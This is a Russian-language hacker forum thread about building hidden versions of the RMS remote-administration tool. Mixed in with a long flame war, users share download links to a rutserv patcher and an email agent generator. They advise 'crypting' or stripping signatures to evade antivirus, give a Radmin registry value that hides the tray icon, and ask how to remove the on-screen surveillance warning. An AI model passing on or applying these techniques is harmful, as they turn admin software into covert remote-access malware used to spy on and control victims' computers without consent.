1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

Скрытый RMS [удаленное администрирование]

Тема в разделе "Самое важное", создана пользователем sawyer1992, 25 фев 2011.

1. Namezz
    Namezz Новичок
    Симпатии:
    0
    это для тех кто не хочет юзать паблик а хочешь сделать свою сборку.
    а вот для ленивых и нубов пусть кликают кнопки и программа все сама сделает.

Скачать:
    Patcher rutserv - https://mega.nz/#!1dhkhIJZ!YRTB5R46poSdZFD1DHRDHbrTRy1lQuYcJQPpRRR2myc
    Agent email generator - https://mega.nz/#!EYYFFbyD!Fvghw-8ReELWlB6pMksTMBVEOskbwSVhJjTN20evU6U

Последнее редактирование: 26 апр 2016
    2 апр 2016
  2. Lazun429
    Lazun429 Новичок
    Симпатии:
    0
    Вот такая штука в просторах интернета еще имеется

2 апр 2016
  3. pupup2
    pupup2 Новичок
    Симпатии:
    0
    Ребята,что толку от всей этой и подобной палевной байды которой кишит паблик??!!!Сплошной копипаст пошел на форуме! Лучше уж пустота,чем этот хлам.Тут есть нормальные люди,не барыги ,которые могут помочь со сборкой и безпалевностью?А то реально тема начала умирать и я уж думаю что и сам RMS и игры с ним-тоже.Да,было время когда еще 5.0 был,все были дружные помогали друг другу и палевности не было и школоты барыжной и ютубовской =) Сами же себе и извиняюсь гадите(Если остались еще с того времени люди добрые и безвозмездные,помогите ,буду благодарен искренно.Спасибки заранее,и прекрасного вам настроения всем=)

4 апр 2016
  4. Namezz
    Namezz Новичок
    Симпатии:
    0
    Пацан, все что я размещал в этой теме, делал лично сам, нуль кописаста а толк от этой "бойды" есть... и вообще то что я разместил в этой теме вообще нигде в пабе за столько лет не было...

4 апр 2016
  5. pupup2
    pupup2 Новичок
    Симпатии:
    0
    Это кто еще пацан то? Что толку от твоей палевной байды,не важно была она на паблике или нет!Так какой от нее ток то?скажи,будь так любезен))Пиар?Хмм,сомнительно что то..

5 апр 2016
  6. Namezz
    Namezz Новичок
    Симпатии:
    0
    хах палевной ? так поставь галочку на возможность криптовать и будет беспалевная "бойда" а вообще у тебя так бомбит потому что я наверно вашу борыжную контору спалил хыыыыыыыыы
    причем здесь вообще пиар просто ну не нравиться мне что всякие шкалабесы такие изи патчи продают...
    ну а кто ты кроме как не пацан неужеле тебе лет 40? О_о
    надо тему закрывать тут больше нечего обсуждать...

6 апр 2016
  7. pupup2
    pupup2 Новичок
    Симпатии:
    0
    Слушай чувак,я тут на форуме с марта 2011 года,еще с RMS 5.0 ,ты о какой конторе вообще говоришь?что за бред ты несешь?! И да,мне именно почти что 40 лет (Паспорт показать?)) ) !Дальше то что? Во всех стезях ты лохонулся,как истеричка себя ведешь.Будь мужиком,с возможностью криптовки=) И устраивай разборки в личке не засоряй чат,будь так любезен =) Ну а клеветать удел-убогих ,сам понимаешь...Цитата: "а вообще у тебя так бомбит потому что я наверно вашу барыжную контору спалил хыыыыыыыыы"И вообще про байду я это не тебе писал))
    Ну а если сам сделал,то низкий тебе поклон.

Последнее редактирование: 8 апр 2016
    8 апр 2016
  8. Lazun429
    Lazun429 Новичок
    Симпатии:
    0
    @pupup2, @pupup2, @pupup2,
    А чем тебе подобный софт не нравится, какая палевная байда? это не паблик сборка вообщето, а специальная утилита для автоматического пропатчивания файлов. Причем тут вообще палевность? Не хочеш чтобы файлы палились, чисть сигнатуры или криптуй. Все в твоих руках.
    Ты сам то хоть что нибудь полезное для форума сделал? Специально посмотрел все твои сообщения, вообще ни чего не нашел. Ты сначала сам чтонибудь полезное создай, а потом пальцы гни.

8 апр 2016
  9. scalpel
    scalpel Новичок
    Симпатии:
    5
    Ничего личного,но билдер,это автоматический конфигуратор и возможно модификатор кода,однотипный,но на долго этого не хватает,лучше использовать разные вариации,но уже в ручном режиме,или полуавтоматически.Мое личное мнение только и всего.

10 апр 2016
  10. forv
    forv Продвинутый
    Симпатии:
    49
    На одном форуме прочитал, сам не тестил - не знаю на сколько работающие решение:
    Для. Radmin 3.5 Полная версия с Radmin Deployment Package v3.5
    HKEY_LOCAL_MACHINE\SOFTWARE\Radmin\v3.0\Server\HackRemoveIcon
    или
    HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Radmin\v3.0\Server\HackRemoveIcon
    в 1.

13 апр 2016
  11. pupup2
    pupup2 Новичок
    Симпатии:
    0
    Слушай меня тупой чувак не понимающий русского языка,я тебе по полкам еще раз объясню,что с тобою хорошо только го..но есть,потому что я еще ложку не достал,а ты уже тарелку на понтах облизываешь как школота !
    1).Тебе русским языком сказали,разборки в личке!
    2).Твоя клевета по поводу конторы-беспочвенна!(Раз ты не понял,ниже тебе тупому разжую)
    3) твой наговор что я школота,тем более!(Покажу паспорт)
    3)По поводу того что я не помогаю?( Ты даже не представляешь чувак сколько у меня от сюда хороших ребят вк,скайпе,асе,и.т.д и я те программист,но в удовольствием помогал что знал и делился,потому что сюда пришел дуб-дубом и этот форум по теме изучил От и-ДО ,нам помогали знающие люди и мы это ценили,вот почему первые трои держаись годами!Так что кто бы бл.говорил про барыг,но только не тебе!)
    4)Замечание мое по поводу билдера палевного, БЫЛИ СДЕЛАНЫ ВООБЩЕ- НЕ ТЕБЕ!!!
    5).Стрелки переводить ,удел -убогих,а то( ты сам то что нибудь сделал? ) Главное что я тут говна не делал и не сувал сюда говно! Я и сам научился ковырять rutserv ,ручками своим умом и бессонными ночами !
    И того вывод :Чувак,мало того,что ты как дебил слепой и непонятливый,так еще и паранойей страдаешь! По ходу дела ты любитель по себе судить людей ,так ничего мне и не доказал!
    P\S: Я тебе доказал,БОЛЬШЕ Я ТЕБЕ Отвечать - НЕ СОБИРАЮСЬ !!!Чао!!В себе разберись,прежде чем пальцами своими тыкать в других!

21 апр 2016
  12. Lazun429
    Lazun429 Новичок
    Симпатии:
    0
    Ты реально неадекватный, или прикидываешся? Когда я тебя школотой называл? Покажи! Где я про какую-то контору говорил? У тебя что глаза не на том месте ростут? Капец из тебя говно полезло когда правду написали, что ты ни кто, и звать тебя не как!. Я удовлетворен!
    П.С. Модераторы, удалите плиз весь этот срач с форума.

22 апр 2016
  13. pupup2
    pupup2 Новичок
    Симпатии:
    0
    Ты уж извини,ники спутал ,не тебе писал вообщем то,тебе только это относится :
    И про какую правду ты говоришь???Я тебя вообще не трогал и не с тобой общался,умный блина,влез не зная брода.Или ты такой же?-по себе судить и обвинять? Говно он увидел,да потому что о говне и думаешь,вот тебе и мерещится оно))А то"..я..посмотрел..ты нифига не сделал"..Тебя тут и в помине не было когда тема про RMS 5.0 начиналась !И он не палился!И долго!!!Как истеричка себя ведешь, мог бы если ты такой умный и догадаться кому это было предназначено.
    P\S: Удовлетворенный,я вообще не понимаю,какого фига ты влез в чужие дебаты?Умник!

Последнее редактирование: 24 апр 2016
    24 апр 2016
  14. v1nest
    v1nest Выёбистый СМ ^^ Команда форума Глобальный модератор
    Симпатии:
    52
    Товарищи, прекращайте флудить, такие терки решайте в ПМ, буду карать баном!

24 апр 2016
  15. EvilKatran
    EvilKatran Новичок
    Симпатии:
    0
    А пароль на архив не подскажете?

28 апр 2016
  16. igor13264927
    igor13264927 Новичок
    Симпатии:
    1
    28 апр 2016
  17. Namezz
    Namezz Новичок
    Симпатии:
    0
    RMS там же написано.

30 апр 2016
  18. EvilKatran
    EvilKatran Новичок
    Симпатии:
    0
    Спасибо
    Скачал, вроде все правильно пропатчил но все равно баннер не снимается, буду копать дальше

3 май 2016
  19. Mr.Burns
    Mr.Burns местная мразь Продвинутый
    Симпатии:
    65
    Мой видос по переименованию. По моему удобный и быстрый.

3 май 2016
  20. EvilKatran
    EvilKatran Новичок
    Симпатии:
    0
    Подскажите пожалуйста чем и где можно удалить баннер - Внимание ведется видеонаблюдение

3 май 2016

Поделиться этой страницей

Загрузка...